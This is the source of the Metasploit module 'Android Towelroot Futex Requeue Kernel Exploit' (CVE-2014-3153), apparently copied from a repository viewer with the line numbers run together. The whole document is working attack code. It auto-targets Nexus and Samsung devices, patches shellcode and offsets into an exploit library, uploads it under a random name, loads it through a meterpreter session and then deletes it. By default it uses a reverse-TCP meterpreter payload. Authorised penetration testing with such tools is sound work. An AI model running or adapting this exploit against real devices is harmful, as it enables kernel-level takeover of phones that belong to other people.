Path: blob/master/modules/exploits/android/local/futex_requeue.rb
19566 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Post::File9include Msf::Post::Common10prepend Msf::Exploit::Remote::AutoCheck1112def initialize(info = {})13super(14update_info(15info,16{17'Name' => "Android 'Towelroot' Futex Requeue Kernel Exploit",18'Description' => %q{19This module exploits a bug in futex_requeue in the Linux kernel, using20similar techniques employed by the towelroot exploit. Any Android device21with a kernel built before June 2014 is likely to be vulnerable.22},23'License' => MSF_LICENSE,24'Author' => [25'Pinkie Pie', # discovery26'geohot', # towelroot27'timwr' # metasploit module28],29'References' => [30[ 'CVE', '2014-3153' ],31[ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],32[ 'URL', 'http://web.archive.org/web/20160912014145/http://blog.nativeflow.com:80/the-futex-vulnerability' ],33],34'DisclosureDate' => '2014-05-03',35'SessionTypes' => [ 'meterpreter' ],36'Platform' => [ 'android', 'linux' ],37'Payload' => { 'Space' => 2048 },38'DefaultOptions' => {39'WfsDelay' => 300,40'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'41},42'Notes' => {43'Stability' => [CRASH_SAFE],44'SideEffects' => [],45'Reliability' => [],46'AKA' => ['towelroot']47},48'DefaultTarget' => 0,49'Targets' => [50# Automatic targetting via getprop ro.build.model51['Automatic Targeting', { 'auto' => true }],5253# This is the default setting, Nexus 4, 5, 7, etc54[55'Default',56{57'new_samsung' => false,58'iovstack' => 2,59'offset' => 0,60'force_remove' => false61}62],6364# Samsung devices, S3, S4, S5, etc65[66'New Samsung',67{68'new_samsung' => true,69'iovstack' => 2,70'offset' => 7380,71'force_remove' => true72}73],7475# Older Samsung devices, e.g the Note 276[77'Old Samsung',78{79'new_samsung' => false,80'iovstack' => 1,81'offset' => 0,82'force_remove' => true83}84],8586# Samsung Galaxy Grand, etc87[88'Samsung Grand',89{90'new_samsung' => false,91'iovstack' => 5,92'offset' => 0,93'force_remove' => true94}95],96],97'Compat' => {98'Meterpreter' => {99'Commands' => %w[100core_loadlib101stdapi_fs_delete_file102stdapi_fs_getwd103]104}105}106}107)108)109end110111def check112os = cmd_exec('getprop ro.build.version.release')113unless Rex::Version.new(os) < Rex::Version.new('4.5.0')114vprint_error "Android version #{os} does not appear to be vulnerable"115return CheckCode::Safe116end117vprint_good "Android version #{os} appears to be vulnerable"118119CheckCode::Appears120end121122def exploit123if target['auto']124product = cmd_exec('getprop ro.build.product')125fingerprint = cmd_exec('getprop ro.build.fingerprint')126print_status("Found device: #{product}")127print_status("Fingerprint: #{fingerprint}")128129if [130'mako',131'm7',132'hammerhead',133'grouper',134'Y530-U00',135'G6-U10',136'g2',137'w7n',138'D2303',139'cancro',140].include? product141my_target = targets[1] # Default142elsif [143'klte', # Samsung Galaxy S5144'jflte', # Samsung Galaxy S4145'd2vzw' # Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)146].include? product147my_target = targets[2] # New Samsung148elsif [149't03g',150'm0',151].include? product152my_target = targets[3] # Old Samsung153elsif [154'baffinlite',155'Vodafone_785',156].include? product157my_target = targets[4] # Samsung Grand158else159print_status("Could not automatically target #{product}")160my_target = targets[1] # Default161end162else163my_target = target164end165166print_status("Using target: #{my_target.name}")167168local_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-3153.so')169exploit_data = File.read(local_file, mode: 'rb')170171# Substitute the exploit shellcode with our own172space = payload_space173payload_encoded = payload.encoded174exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))175176# Apply the target config177offsets = my_target.opts178config_buf = [179offsets['new_samsung'] ? -1 : 0,180offsets['iovstack'].to_i,181offsets['offset'].to_i,182offsets['force_remove'] ? -1 : 0,183].pack('I4')184exploit_data.gsub!('c0nfig' + "\x00" * 10, config_buf)185186workingdir = session.fs.dir.getwd187remote_file = "#{workingdir}/#{Rex::Text.rand_text_alpha_lower(5)}"188write_file(remote_file, exploit_data)189190print_status("Loading exploit library #{remote_file}")191session.core.load_library(192'LibraryFilePath' => local_file,193'TargetFilePath' => remote_file,194'UploadLibrary' => false,195'Extension' => false,196'SaveToDisk' => false197)198print_status("Loaded library #{remote_file}, deleting")199session.fs.file.rm(remote_file)200print_status("Waiting #{datastore['WfsDelay']} seconds for payload")201end202end203204205